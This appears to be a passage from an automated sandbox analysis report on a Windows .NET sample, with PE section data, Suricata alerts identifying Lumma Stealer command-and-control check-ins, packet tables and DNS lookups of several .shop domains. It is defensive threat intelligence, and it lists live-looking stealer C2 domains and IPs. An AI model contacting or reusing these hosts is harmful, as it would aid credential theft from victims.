                                                                .rsrc0x5e0000x5b80x600e0c57c891752f78d44441c65570fe51eFalse0.4381510416666667data4.119761219082767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x600000xc0x20093175a635d4731115c9b1e1c282e8f9eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_VERSION0x5e0a00x324data0.4552238805970149
                                                                RT_MANIFEST0x5e3c80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-09-26T09:52:06.643740+02002056048ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop)1192.168.2.4631481.1.1.153UDP
                                                                2024-09-26T09:52:06.724512+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.4606021.1.1.153UDP
                                                                2024-09-26T09:52:07.234560+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.458440104.21.4.136443TCP
                                                                2024-09-26T09:52:07.786343+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458440104.21.4.136443TCP
                                                                2024-09-26T09:52:07.786343+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458440104.21.4.136443TCP
                                                                2024-09-26T09:52:07.792672+02002056162ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)1192.168.2.4528101.1.1.153UDP
                                                                2024-09-26T09:52:08.270066+02002056163ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)1192.168.2.458441188.114.97.3443TCP
                                                                2024-09-26T09:52:08.769507+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458441188.114.97.3443TCP
                                                                2024-09-26T09:52:08.769507+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458441188.114.97.3443TCP
                                                                2024-09-26T09:52:08.773382+02002056160ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)1192.168.2.4608421.1.1.153UDP
                                                                2024-09-26T09:52:09.259590+02002056161ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)1192.168.2.458442188.114.96.3443TCP
                                                                2024-09-26T09:52:09.681716+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458442188.114.96.3443TCP
                                                                2024-09-26T09:52:09.681716+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458442188.114.96.3443TCP
                                                                2024-09-26T09:52:09.685196+02002056158ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)1192.168.2.4558921.1.1.153UDP
                                                                2024-09-26T09:52:10.172268+02002056159ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)1192.168.2.458443188.114.96.3443TCP
                                                                2024-09-26T09:52:10.618108+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458443188.114.96.3443TCP
                                                                2024-09-26T09:52:10.618108+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458443188.114.96.3443TCP
                                                                2024-09-26T09:52:10.620207+02002056156ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)1192.168.2.4645981.1.1.153UDP
                                                                2024-09-26T09:52:11.097484+02002056157ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)1192.168.2.458444104.21.58.182443TCP
                                                                2024-09-26T09:52:11.567762+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458444104.21.58.182443TCP
                                                                2024-09-26T09:52:11.567762+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458444104.21.58.182443TCP
                                                                2024-09-26T09:52:11.569455+02002056154ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)1192.168.2.4537261.1.1.153UDP
                                                                2024-09-26T09:52:12.055505+02002056155ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)1192.168.2.458445188.114.97.3443TCP
                                                                2024-09-26T09:52:12.512577+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458445188.114.97.3443TCP
                                                                2024-09-26T09:52:12.512577+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458445188.114.97.3443TCP
                                                                2024-09-26T09:52:12.513950+02002056152ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)1192.168.2.4533381.1.1.153UDP
                                                                2024-09-26T09:52:12.996046+02002056153ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)1192.168.2.458446188.114.96.3443TCP
                                                                2024-09-26T09:52:13.467807+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458446188.114.96.3443TCP
                                                                2024-09-26T09:52:13.467807+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458446188.114.96.3443TCP
                                                                2024-09-26T09:52:13.469353+02002056150ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)1192.168.2.4644471.1.1.153UDP
                                                                2024-09-26T09:52:13.943312+02002056151ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)1192.168.2.458447104.21.77.130443TCP
                                                                2024-09-26T09:52:14.417603+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458447104.21.77.130443TCP
                                                                2024-09-26T09:52:14.417603+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458447104.21.77.130443TCP
                                                                2024-09-26T09:52:16.841999+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.458449172.67.189.2443TCP
                                                                2024-09-26T09:52:16.841999+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.458449172.67.189.2443TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 26, 2024 09:52:06.739407063 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:06.739514112 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:06.739604950 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:06.743361950 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:06.743416071 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.234314919 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.234560013 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:07.237685919 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:07.237703085 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.237987041 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.288292885 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:07.295239925 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:07.295267105 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:07.295407057 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.786358118 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.786451101 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.786500931 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:07.788469076 CEST58440443192.168.2.4104.21.4.136
                                                                Sep 26, 2024 09:52:07.788497925 CEST44358440104.21.4.136192.168.2.4
                                                                Sep 26, 2024 09:52:07.806108952 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:07.806154013 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:07.806226015 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:07.806570053 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:07.806586027 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.269989967 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.270066023 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:08.273355007 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:08.273385048 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.273859024 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.274975061 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:08.275005102 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:08.275065899 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.769520998 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.769617081 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.769783020 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:08.769833088 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:08.769855976 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.769870043 CEST58441443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:08.769876957 CEST44358441188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.787012100 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:08.787065983 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:08.787153959 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:08.787467003 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:08.787477970 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.259497881 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.259589911 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.261116028 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.261128902 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.261373043 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.262583971 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.262615919 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.262651920 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.681730032 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.681816101 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.681873083 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.682040930 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.682060003 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.682071924 CEST58442443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.682076931 CEST44358442188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.699951887 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.699987888 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:09.700068951 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.700406075 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:09.700417995 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.171736956 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.172267914 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.175757885 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.175770998 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.176037073 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.177234888 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.177234888 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.177319050 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.618087053 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.618163109 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.618208885 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.618406057 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.618424892 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.618432045 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.618437052 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.635591030 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:10.635704041 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:10.635813951 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:10.636113882 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:10.636142969 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.097271919 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.097484112 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.098959923 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.098992109 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.099246025 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.100389004 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.100429058 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.100517988 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.567774057 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.567866087 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.567938089 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.568167925 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.568197966 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.568213940 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.568222046 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.583832026 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:11.583856106 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:11.583940029 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:11.584225893 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:11.584235907 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.055355072 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.055505037 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.057269096 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.057284117 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.057506084 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.058676958 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.058676958 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.058765888 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512480974 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512564898 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512732983 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.512907028 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.512907028 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.512921095 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512926102 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.529490948 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.529534101 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.529850006 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.529902935 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.529911041 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.995942116 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.996046066 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.997726917 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.997739077 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.998158932 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.999403954 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.999425888 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.999475002 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.467782974 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.467864037 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.467915058 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:13.468043089 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:13.468060017 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.468070030 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:13.468075991 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.483549118 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.483597994 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.483670950 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.484085083 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.484097004 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.943201065 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.943311930 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.946155071 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.946166992 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.946417093 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.947573900 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.947616100 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.947649002 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.417603970 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.417714119 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.417798042 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:14.417922020 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:14.417973042 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.418004036 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:14.418020964 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.426839113 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:14.426933050 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:14.427021980 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:14.427283049 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:14.427318096 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.081146002 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.081363916 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.083007097 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.083024979 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.083446026 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.084763050 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.127412081 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.598932028 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.598992109 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.599037886 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.599121094 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.599158049 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.599175930 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.599216938 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.890916109 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.890950918 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.890999079 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891004086 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891037941 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891052008 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891072989 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891093016 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891155005 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891206980 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891233921 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891272068 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891278028 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891313076 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891352892 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891547918 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891561985 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891577959 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891582966 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.909923077 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:15.909967899 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:15.910048008 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:15.910383940 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:15.910396099 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.404989958 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.405065060 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.406891108 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.406898975 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.407124996 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.408201933 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.408235073 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.408262968 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842016935 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842117071 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842195988 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.842317104 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.842338085 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842354059 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.842359066 CEST44358449172.67.189.2192.168.2.4

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 26, 2024 09:52:06.643739939 CEST6314853192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:06.721266985 CEST53631481.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:06.724512100 CEST6060253192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:06.733890057 CEST53606021.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:07.792671919 CEST5281053192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:07.805356979 CEST53528101.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:08.773381948 CEST6084253192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:08.786127090 CEST53608421.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:09.685195923 CEST5589253192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:09.699177980 CEST53558921.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:10.620207071 CEST6459853192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:10.633261919 CEST53645981.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:11.569454908 CEST5372653192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:11.583125114 CEST53537261.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:12.513950109 CEST5333853192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:12.528748035 CEST53533381.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:13.469352961 CEST6444753192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:13.482624054 CEST53644471.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:14.419151068 CEST6032053192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:14.426199913 CEST53603201.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:15.894535065 CEST5131953192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:15.908334970 CEST53513191.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Sep 26, 2024 09:52:06.643739939 CEST192.168.2.41.1.1.10x73c6Standard query (0)lootebarrkeyn.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:06.724512100 CEST192.168.2.41.1.1.10x8ceaStandard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:07.792671919 CEST192.168.2.41.1.1.10x68cbStandard query (0)ghostreedmnu.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:08.773381948 CEST192.168.2.41.1.1.10xcd28Standard query (0)offensivedzvju.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:09.685195923 CEST192.168.2.41.1.1.10xef53Standard query (0)vozmeatillu.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:10.620207071 CEST192.168.2.41.1.1.10x1c9eStandard query (0)drawzhotdog.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:11.569454908 CEST192.168.2.41.1.1.10xfd4fStandard query (0)fragnantbui.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:12.513950109 CEST192.168.2.41.1.1.10xdc89Standard query (0)stogeneratmns.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:13.469352961 CEST192.168.2.41.1.1.10xff22Standard query (0)reinforcenh.shopA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:14.419151068 CEST192.168.2.41.1.1.10x248bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                Sep 26, 2024 09:52:15.894535065 CEST192.168.2.41.1.1.10x481cStandard query (0)performenj.shopA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
